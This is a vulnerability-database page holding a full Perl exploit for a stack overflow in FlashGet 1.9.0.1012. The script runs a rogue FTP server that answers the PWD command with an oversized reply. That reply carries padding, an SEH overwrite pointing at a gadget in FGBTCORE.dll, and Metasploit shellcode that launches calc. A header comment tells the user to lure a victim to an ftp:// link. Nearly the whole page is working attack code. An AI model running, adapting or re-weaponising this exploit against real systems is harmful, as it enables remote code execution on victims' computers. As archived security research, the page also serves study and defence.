Vulners
Lucene search
flashget190-overflow.txt
`#!/usr/bin/perl
# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit
# Coded By SkOd, skod.uk at gmail dot com
# Tested over Windows XP sp1 Hebrew
# link your victim to - ftp://localhost/somefile.TORRENT - over internet explorer.
##
# PoC by Krystian Kloskowski (h07) <[email protected]>
# http://milw0rm.com/exploits/6240
##
# special thanks to a friend of mine who helped me
use IO::Socket;
####################################[ Parameters ]########################################
my $SHELLCODE =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6b".
"\xa3\x03\x10\x83\xeb\xfc\xe2\xf4\x97\x4b\x47\x10\x6b\xa3\x88\x55".
"\x57\x28\x7f\x15\x13\xa2\xec\x9b\x24\xbb\x88\x4f\x4b\xa2\xe8\x59".
"\xe0\x97\x88\x11\x85\x92\xc3\x89\xc7\x27\xc3\x64\x6c\x62\xc9\x1d".
"\x6a\x61\xe8\xe4\x50\xf7\x27\x14\x1e\x46\x88\x4f\x4f\xa2\xe8\x76".
"\xe0\xaf\x48\x9b\x34\xbf\x02\xfb\xe0\xbf\x88\x11\x80\x2a\x5f\x34".
"\x6f\x60\x32\xd0\x0f\x28\x43\x20\xee\x63\x7b\x1c\xe0\xe3\x0f\x9b".
"\x1b\xbf\xae\x9b\x03\xab\xe8\x19\xe0\x23\xb3\x10\x6b\xa3\x88\x78".
"\x57\xfc\x32\xe6\x0b\xf5\x8a\xe8\xe8\x63\x78\x40\x03\x53\x89\x14".
"\x34\xcb\x9b\xee\xe1\xad\x54\xef\x8c\xc0\x62\x7c\x08\xa3\x03\x10";
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# The Host that will be listen to the Download request from Flashget
my $HOST = '127.0.0.1'; #your own ip
#################################[Don't Edit From Here]#####################################
######################################[Defines]#############################################
my $PADDING_CHAR = "A";
my $PADDING_SIZE = 324;
#The code will return to next_seh_chain so i make it as jump and invalid address
#so it will be decoded as last in chain.
my $NEXT_SEH_IN_CHAIN = "\xEB\x06\xFF\xFF"; # JMP +6
#Settings Return Address
my $CUR_SEH_ADDRESS = "\x8B\x19\x01\x10";
# Chosen Ret Addr is : 0x1001198B FlashGet\FGBTCORE.dll v1.0. 0.36
# 1001198B 5E POP ESI
# 1001198C 5B POP EBX
# 1001198D C3 RETN
# Building SEH Block
my $SEH_BLOCK = $NEXT_SEH_IN_CHAIN .
$CUR_SEH_ADDRESS;
#Creating Payload
$PAYLOAD = $PADDING_CHAR x $PADDING_SIZE;
$PAYLOAD .= $SEH_BLOCK;
$PAYLOAD .= $SHELLCODE;
$PAYLOAD .= "\x90" x 300; #Putting alot of nops so the code will get Exception that we write after stack is over
#witch will make it to call our code
$LISTEN_PORT = 21;
##########################################################################
print "# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit\r\n";
print "# Coded By SkOd, skod.uk\x40gmail\x2ecom\r\n";
my $serverSocket = new IO::Socket::INET (Listen => 1,
LocalAddr => $HOST,
LocalPort => $LISTEN_PORT,
Proto => 'tcp');
do
{
print "\r\n[~] listening...\r\n";
$clientSocket = $serverSocket->accept();
print "[+] New Connection Recived\r\n";
$clientSocket->send("220 WELCOME!\r\n");
$isPayloadSent = 0;
while($isPayloadSent == 0) {
$clientSocket->recv($recvBuffer,1024);
print "[~] Recived: " . $recvBuffer;
if($recvBuffer =~ /USER/) {
$clientSocket->send("331 Password required for l33t\r\n");
} elsif($recvBuffer =~ /PASS/) {
$clientSocket->send("230 User l33t logged in.\r\n");
} else {
$clientSocket->send("257 \"$PAYLOAD\"\r\n");
print("[+] The payload has been sent...\r\n");
$isPayloadSent = 1;
}
}
$clientSocket->close();
} while (true);
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Aug 2008 00:00Current
7.4High risk
Vulners AI Score7.4